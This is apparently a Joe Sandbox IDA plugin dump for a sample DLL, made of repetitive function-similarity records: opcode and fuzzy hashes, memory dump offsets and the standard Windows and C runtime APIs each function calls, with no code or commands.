                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: \j`7$\j`7$j
                                              • API String ID: 0-3644614255
                                              • Opcode ID: 0834c5273509027094576ee321ae77b924bae9eb8aa13904c13f6963af8d1707
                                              • Instruction ID: afcb1bb98bf0f806d3a2557b8435494d6e77d7fefb7a462659622958e0137889
                                              • Opcode Fuzzy Hash: 0834c5273509027094576ee321ae77b924bae9eb8aa13904c13f6963af8d1707
                                              • Instruction Fuzzy Hash: 6D4223756093828FCB28CF68C49065EBBE1ABC9354F144A1EE4D9C77A1D334D84ACB67
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C259CE5
                                                • Part of subcall function 6C22FC2A: __EH_prolog.LIBCMT ref: 6C22FC2F
                                                • Part of subcall function 6C2316A6: __EH_prolog.LIBCMT ref: 6C2316AB
                                                • Part of subcall function 6C259A0E: __EH_prolog.LIBCMT ref: 6C259A13
                                                • Part of subcall function 6C259837: __EH_prolog.LIBCMT ref: 6C25983C
                                                • Part of subcall function 6C25D143: __EH_prolog.LIBCMT ref: 6C25D148
                                                • Part of subcall function 6C25D143: ctype.LIBCPMT ref: 6C25D16C
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog$ctype
                                              • String ID:
                                              • API String ID: 1039218491-3916222277
                                              • Opcode ID: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                              • Instruction ID: 8cd30a736f1fbc9afd918773338239005237bbfc9b9596ac315bba1bd010f175
                                              • Opcode Fuzzy Hash: 098dff2231b0858f17f8b87dde5ab3f8fadd385b4ae7cbdd9e046d221faa4b6f
                                              • Instruction Fuzzy Hash: 7803DE3080124DDFDF11DFA8C980BEEBBB0AF15308F548099E80967A91DB749B99DF61
                                              APIs
                                              • IsDebuggerPresent.KERNEL32(?,?,?,?,?,00000000), ref: 6C203969
                                              • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,00000000), ref: 6C203973
                                              • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,00000000), ref: 6C203980
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                              • String ID:
                                              • API String ID: 3906539128-0
                                              • Opcode ID: 2c31fc84d78282f2ef06b485b9a2717653f9357066612219ccb9e5be73a8335b
                                              • Instruction ID: 6ee0a952159ab212a6f9277e5f00be5fc14702c2fdb3ea5f9ca04e287bd69684
                                              • Opcode Fuzzy Hash: 2c31fc84d78282f2ef06b485b9a2717653f9357066612219ccb9e5be73a8335b
                                              • Instruction Fuzzy Hash: BD31A27490121D9BCB21DF29D888BC9BBF4BF08714F5055EAE81CA7290E7749B858F44
                                              APIs
                                              • GetCurrentProcess.KERNEL32(?,?,6C202925,?,?,?,?), ref: 6C20288F
                                              • TerminateProcess.KERNEL32(00000000,?,6C202925,?,?,?,?), ref: 6C202896
                                              • ExitProcess.KERNEL32 ref: 6C2028A8
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: Process$CurrentExitTerminate
                                              • String ID:
                                              • API String ID: 1703294689-0
                                              • Opcode ID: f735733f7e29217f6ca13cee6541c3dad69fb299e228ca45f07011184e6c4251
                                              • Instruction ID: 07b8d03b61a40e62751eb8460d3639eeacdb7633f15c03939416d873bb571aed
                                              • Opcode Fuzzy Hash: f735733f7e29217f6ca13cee6541c3dad69fb299e228ca45f07011184e6c4251
                                              • Instruction Fuzzy Hash: 89E04635205208ABCF016F20C80CA983B78FB49B56B140426FC0886660CB3AE882CA90
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID: x=J
                                              • API String ID: 3519838083-1497497802
                                              • Opcode ID: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                              • Instruction ID: b5bd5c7d73cada446e83dcd681a3c8d9de6ea9c263079b302f9098ee55763f19
                                              • Opcode Fuzzy Hash: c284c417a2f68c1c742bc951fc924e558872fa0b35763257f7574c1e26c9a400
                                              • Instruction Fuzzy Hash: 6F910531D0011E9BEF14EFA8C8909EDF775BF05709F208169EC5267A51DF399A49CB90
                                              APIs
                                              • std::invalid_argument::invalid_argument.LIBCONCRT ref: 6C1FAFA0
                                              • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6C1FB7C3
                                                • Part of subcall function 6C1FCA69: RaiseException.KERNEL32(E06D7363,00000001,00000003,6C1FB7AC,00000000,?,?,?,6C1FB7AC,?,6C22853C), ref: 6C1FCAC9
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                               • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                               • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: ExceptionFeaturePresentProcessorRaisestd::invalid_argument::invalid_argument
                                              • String ID:
                                              • API String ID: 915016180-0
                                              • Opcode ID: 925d0163790238de732466850461b0bccee59402ba3c18f29d90b59fe64ca374
                                              • Instruction ID: 8e675fa6a5bf3180d1c42e23813a56f87cb70744112d5727c0305a7fd3cb0584
                                              • Opcode Fuzzy Hash: 925d0163790238de732466850461b0bccee59402ba3c18f29d90b59fe64ca374
                                              • Instruction Fuzzy Hash: 4BB1DDB1A442099FDB14DF65D8C569EBBF1FB49328F20812AD835E7780D3789645CFA0
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: @4J$DsL
                                              • API String ID: 0-2004129199
                                              • Opcode ID: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                              • Instruction ID: 8b3451ba6c2e7a406f3f3e5253663bc5ef37afcd5b003aa00c74a131f31eb796
                                              • Opcode Fuzzy Hash: 9b82dfd3553fe836d7aa24bd6b5882a619f6ea42a248f1f14d7e615b1deddf65
                                              • Instruction Fuzzy Hash: 71218F377A4C564BD74CCA28DC33EB92680E748305B89527EEE4BCB7D1DE6D8800CA48
                                              APIs
                                              • __EH_prolog.LIBCMT ref: 6C24840F
                                                • Part of subcall function 6C249137: __EH_prolog.LIBCMT ref: 6C24913C
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: H_prolog
                                              • String ID:
                                              • API String ID: 3519838083-0
                                              • Opcode ID: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                              • Instruction ID: f12e076bbf495e1fe7c99793c530b5159dd6f01101b6bd56f0781ec836d29a54
                                              • Opcode Fuzzy Hash: 8552379c3bb9a98a981715b0c2d56659a9b66d2cd3d1a4f2db75c79318028cc2
                                              • Instruction Fuzzy Hash: D5626A7191125ECFDF19CFA8C890BEDBBB5BF04309F14816AE805AB680D7B49A44CF91
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: YA1
                                              • API String ID: 0-613462611
                                              • Opcode ID: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                              • Instruction ID: acb59359667122cdce0693759d78f5fda63dbf177d905dda7aed9082527518c1
                                              • Opcode Fuzzy Hash: df9d50bcc828b940dfae17b14b827ef815617663f23fa9b0dba43a4edbf83f29
                                              • Instruction Fuzzy Hash: 1542D0706093858FD315CF68C49069ABBE2FFD9308F144A6DE8D68B742D671D94BCB82
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID: __aullrem
                                              • String ID:
                                              • API String ID: 3758378126-0
                                              • Opcode ID: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                              • Instruction ID: b74e361f55ec07437eb2ca93acb3f00d7222a15b20dd389ee759cd99d6c83e15
                                              • Opcode Fuzzy Hash: d1b669466a100d6f0f6c84f42758606c7eb5b4ffe16e73214497a835af333093
                                              • Instruction Fuzzy Hash: DB51E8B1A083599BD711CF5AC4C02EDFBE6EF79214F18C05EEC8897242D27A599BC760
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID: 0-3916222277
                                              • Opcode ID: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                              • Instruction ID: 444f74f1ba2ebc1d2bcd3a2698fcecd6a22f3fb72d361b051c292d9a33b9a73c
                                              • Opcode Fuzzy Hash: acb8407a1b1d291f125d5a9761f4a1fdf91c25411dab1fb78ed15b47a431c268
                                              • Instruction Fuzzy Hash: 9B02AC316083498BD725CF69C49079EBBE2AFC8708F144A2DECC997B51C775D94ACB82
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: (SL
                                              • API String ID: 0-669240678
                                              • Opcode ID: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                              • Instruction ID: 5445667c3c96a8d183b7f7f64370d1e64546c00ad7cbf938ce02396fd1afe68c
                                              • Opcode Fuzzy Hash: 403d64dc1b872b29255918294ce527b86f393edeaddcf848938bb8168c435548
                                              • Instruction Fuzzy Hash: 23519577E208354AD78CCE24DC2177672D2E784310F8BC2B99D4BAB6E6DD78585487C4
                                              Strings
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: B
                                              • API String ID: 0-1255198513
                                              • Opcode ID: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                                              • Instruction ID: f2376a7c90a1890f358461a779e17ac7574a041164d69a8781db002053fa676a
                                              • Opcode Fuzzy Hash: 26643807f12313c04aaa413d9f20b4c0588d72bb55b68c80837e514dee027d31
                                              • Instruction Fuzzy Hash: 633124315087558BD314DF28D884AABB3E2FBC4326F60CA3ED89ACBA94E7745815CF41
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                              • Instruction ID: 87a65fef56fe4972e9c82fbc0ef6a3349988f435d43934b5f13176442ce449e0
                                              • Opcode Fuzzy Hash: 3901934d13cb486671902a8639e4417b1e8cd50483714420dc8c7fa42b5c990c
                                              • Instruction Fuzzy Hash: CA526171208B468BD319CF69C4906AAF7E2BF85308F144A2DD8DAC7B51DB74F84ACB45
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                              • Instruction ID: ea0a3b40b43971d6e6f17f8400ba4e69f2f0bd3f6bd2d77d07d719987ba49f01
                                              • Opcode Fuzzy Hash: bb173c08d896bf76c8f12b9495eb2c2eeed1eb95d4f1202fd14126b970d45cbc
                                              • Instruction Fuzzy Hash: 2A6207B5A083498FC714CF19C48055AFBE1BFC8789F244A6EF899A7719D770E845CB82
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                              • Instruction ID: 518e1be138c818db7778ceb557659176ca574acfa34999f1317ddd86c6dba693
                                              • Opcode Fuzzy Hash: ae17103ab74f7c7ba27116ddf20acfa1a33030b9793f89cfab32f42cff4eb5f1
                                              • Instruction Fuzzy Hash: 5D12CC7120934A8FC718CFA8C5D066ABBE2BFC8704F54492DE996C7B45DB31E846CB85
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                              • Instruction ID: b10d1703c498bffa30f6dad53a9667955a0b7b85a355e494c4e87d22cc0bf429
                                              • Opcode Fuzzy Hash: f4c3878cdf6dda1e5ca36c24f377bc52bcf6993d29949e9196dea34e7f5de905
                                              • Instruction Fuzzy Hash: 3B02FD32A083158BC319CE28C4D0259BBF2FBC47D9F154B2EEC96E7A54D7749944CBA2
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                              • Instruction ID: 4046654c9d1006cb224c856a808064d4c78ef2b09a35cf40d44b3b0da10770db
                                              • Opcode Fuzzy Hash: 1d22da7b9f01d20fe9c2b0fcfce1f7ad9ec50e907d9644d55dcb606a953bfaed
                                              • Instruction Fuzzy Hash: 34F141726043898BEB28CE69D8547EEB7E2FBC1304F544939EC89CBB41DB35950AC781
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                              • Instruction ID: 005427539762969a8fe980537d7a2e8de49748293c07d3207eae34ed5a361b77
                                              • Opcode Fuzzy Hash: 37fe9a4fd3af81bafc73f8bd31f63684d8e342a2009f8b6bc144f44596592570
                                              • Instruction Fuzzy Hash: B6D12FB150471A8FD319CF1CC4A8236BBE1FF86349F054ABDEAA69B38AD7349505CB50
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
                                              • Associated: 00000006.00000002.1925984009.000000006C070000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1926004056.000000006C071000.00000020.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933045900.000000006C21B000.00000002.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1934437636.000000006C3E7000.00000002.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b1f756ee2fe841902191c907d409ace29a41e7dd29706095e1f65657f94ace09
                                              • Instruction ID: 588d5d55babb9e108bc1379c90ec4e8cb9bc3917865d07866a060824a78caf1c
                                              • Opcode Fuzzy Hash: b1f756ee2fe841902191c907d409ace29a41e7dd29706095e1f65657f94ace09
                                              • Instruction Fuzzy Hash: 1AB1B8366187128FD318DE78D8508FB73E2EBC1324F558A3EE196C79C4DB35951A8B82
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                              • Instruction ID: 1aff26db37b8d9e28fdc9034368e5c669ce298b38f01fe71844c9ab80e573d65
                                              • Opcode Fuzzy Hash: ae4b2f2b70234ac2bedfdde99fbf7177c16b95a6c2c71cfcccbd0d12063c7eec
                                              • Instruction Fuzzy Hash: 9DC1F535204B468BC718CE79D0A0697BBE2EFD9314F148A7CD8CA4BB55DA30A40ECB55
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                              • Instruction ID: 11d812c969f05dfe5d36e4a4f9b08924c64c56ffed79d1121a51fd838ee6b449
                                              • Opcode Fuzzy Hash: d6cb5a5b9c3abea019be7d104db6e1742bcc809bf8f8dd5f8f219f0a705516a1
                                              • Instruction Fuzzy Hash: 7FB1C331304B098BE354DEB9C890BDAB7E1AF84318F04492DDDAB8B751EF34A54AC795
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                              • Instruction ID: f7cc8055ce53d706aebe79a55b198720e940c3361842e9dfee2d70d61825ca34
                                              • Opcode Fuzzy Hash: a42b4b82a53dfb7125c27c391958f90512e79f572afba738efee2a2e68b245a2
                                              • Instruction Fuzzy Hash: E6B1CD75608B068BC304DF69C8806ABF7E2FFC8304F14892DE899C7715EB71A55ACB95
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                              • Instruction ID: 1535d9776a7efc87e8fd20aee76fc4ef7302d311cf52dc5529dcab6f55572b59
                                              • Opcode Fuzzy Hash: 57f28dc9a1232a8c06b083a4d088c40ef3b8ca8235aec33933a76f5351274b3b
                                              • Instruction Fuzzy Hash: 8CA1E37160C3458FC309DF69C49069ABBE1ABD9748F044A2DF8D6C7741D632E94BCB42
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933122115.000000006C22B000.00000008.00000001.01000000.00000009.sdmp, Offset: 6C22B000, based on PE: true
                                              • Associated: 00000006.00000002.1933680147.000000006C2F6000.00000004.00000001.01000000.00000009.sdmp
                                              • Associated: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_6_2_6c070000_yvaKqhmD4L.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                              • Instruction ID: 73bfbe52680341ff57138185dada60005055a6cc1b792e7091167c84844b3279
                                              • Opcode Fuzzy Hash: b96a3bfa2f071fda60c0812de3eea8bd7f1a293af8749856eb5c89b36b6714e8
                                              • Instruction Fuzzy Hash: F781E135A047068FC321DF69C480256B7E1FF99B04F28CAADD9999B711E732E947CB81
                                              Memory Dump Source
                                              • Source File: 00000006.00000002.1933741852.000000006C2FC000.00000020.00000001.01000000.00000009.sdmp, Offset: 6C070000, based on PE: true
